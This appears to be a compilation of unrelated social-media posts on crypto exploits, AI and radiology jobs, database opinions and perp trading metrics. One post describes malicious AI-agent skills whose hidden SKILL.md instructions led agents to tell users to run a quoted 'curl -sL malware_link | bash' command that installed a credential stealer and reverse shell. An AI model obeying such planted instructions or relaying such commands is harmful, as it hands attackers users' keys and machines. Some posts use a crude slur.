@LayerZero_Core > the attacker was able to gain access to the list of RPCs our DVN uses, compromise two of them – which were independent nodes running on separate clusters without direct connection to each other – and swap out binaries running the op-geth nodes feel like we need more info here

We have deployed a new secondary market for aEthWETH. Following today’s incident involving Aave’s rsETH market where approximately $200M was extracted, we moved to support secondary liquidity for affected positions. aEthWETH depositors can now access secondary market liquidity, enabling price discovery and a path to exit for affected users.

@LayoffAI radiologists have been in decline for years. most ppl consider them glorified pattern matchers, regulatory hurdles the main reason why they’re still alive. even pre llm many would moonlight to provide training data for old classification models. older gen know the end is near.

It takes 13 years to become a radiologist. Four years of medical school. A preliminary year. Four years of residency. Maybe a fellowship. $200,000 in debt before you read your first scan as an attending. The CEO of America's largest public hospital system just said he could replace "a great deal" of them with AI right now. Oracle began to fire 30,000 workers this morning. Block cut half its workforce last month. Google eliminated 35% of its managers. Amazon, Meta, Microsoft, all flattening. But those were tech workers. Middle managers. People in cubicles writing code or routing information. Now it is doctors. 44% of medical students already say AI made radiology less appealing as a career. The training pipeline is collapsing before the jobs even disappear. There are only 41,000 radiologists in the country. The shortage is projected through 2055. And instead of training more, the conversation has shifted to replacing them. Nobody is safe. We will keep digging into the data and reporting the facts.

CEO of America’s largest public hospital system says he’s ready to replace radiologists with AI. Mitchell H. Katz, MD, the president and CEO of New York City’s public hospital system, has stated that he is prepared to begin replacing radiologists with artificial intelligence for certain diagnostic tasks as soon as the regulatory environment permits. Speaking at a recent panel, Katz highlighted the potential for AI to serve as the "first reader" for routine screenings such as mammograms and X-rays, which would allow hospitals to realize significant financial savings amid the rising costs of human specialists. In this scenario, radiologists would transition into a secondary role, only reviewing images that the technology identifies as abnormal. Other healthcare leaders supported this vision, citing data that suggests AI can be more accurate than humans in specific low-risk screenings. However, this proposal has met with intense opposition from medical professionals who argue that such a shift would pose a severe threat to patient safety. Radiologists have criticized hospital administrators for being "confidently uninformed," claiming that current AI technology is not yet capable of providing independent patient care without human oversight.

If you’re writing opinions on whether to do code reviews, write tests, or any part of production lifecycles these days, you should have to disclose if you personally are part of a PagerDuty rotation

Hating on Postgres' query planner is yet another example of holding a machine to a higher standard than yourself. People that brick their MySQL instance using force index don't blog about it.

Wait I just realized that there is a marketplace for markdown files. Like, a package manager that will download you a text file with .md extension and that's it. Are vibe coders actually this retarded?

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

perps by Volume/OI ratio this is one of the cleanest wash trading indicators. @ethereal - 0.96x @variational - 2.12x @paradex - 2.21x @Lighter_xyz - 3.85x @extendedapp - 8.4x > what it tells you: volume is how much people trade. oi is how much risk people actually keep open. when volume is way higher than oi, it usually means positions are short-lived intra-day flipping, liquidity being rotated back and forth. not necessarily fake volume, but often "farmed" volume. > ethereal at 0.96x looks the cleanest oi is HIGHER than volume > extended at 8.4x is the opposite a lot of activity, but it doesnt stick as open interest thats what overfarmed flow looks like. if you're looking for the most underappreciated perp venue right now, ethereal being the lowest ratio on the list is a strong signal that the activity is less washed and more organic.

@_colemurray @tom_doerr i ditched minio a few months ago when they announced they’ll stop publishing to docker. localstack isn’t as terrible like they were 5 years ago and often you’ll end up wanting to fake KMS and SM eventually. github.com/minio/minio/is…

pg partitions and replicas are basically nuanced scams. if you're the type to say "oh yeh just use shards and partition your data" as a surface solution to a scaling problem then you will not pass the fizz buzz interview test
